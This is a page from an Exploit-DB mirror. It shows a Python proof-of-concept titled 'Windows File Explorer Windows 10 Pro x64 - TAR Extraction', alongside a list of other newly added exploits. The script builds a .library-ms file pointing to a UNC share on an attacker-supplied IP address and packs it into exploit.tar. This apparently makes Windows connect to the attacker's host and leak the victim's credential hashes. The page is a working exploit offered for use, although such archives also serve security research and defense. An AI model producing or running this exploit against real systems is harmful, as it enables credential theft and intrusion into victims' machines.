exploit-db-mirror/exploits/windows/remote/52325.py
Exploit-DB b83d852b2f DB: 2025-06-14
7 changes to exploits/shellcodes/ghdb

Freefloat FTP Server 1.0 - Remote Buffer Overflow

Roundcube 1.6.10 - Remote Code Execution (RCE)

Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)

PCMan FTP Server 2.0.7 - Remote Buffer Overflow

Windows File Explorer Windows 10 Pro x64 - TAR Extraction
2025-06-14 00:16:30 +00:00

34 lines
No EOL
939 B
Python
Executable file

import os
import tarfile
def main():
file_name = input("Enter your file name: ")
ip_address = input("Enter IP (EX: 192.168.1.162): ")
library_content = f"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\\\{ip_address}\\IT</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
"""
library_file_name = f"{file_name}.library-ms"
with open(library_file_name, "w", encoding="utf-8") as f:
f.write(library_content)
tar_name = "exploit.tar"
with tarfile.open(tar_name, "w") as tarf:
tarf.add(library_file_name)
if os.path.exists(library_file_name):
os.remove(library_file_name)
print("completed")
if __name__ == "__main__":
main()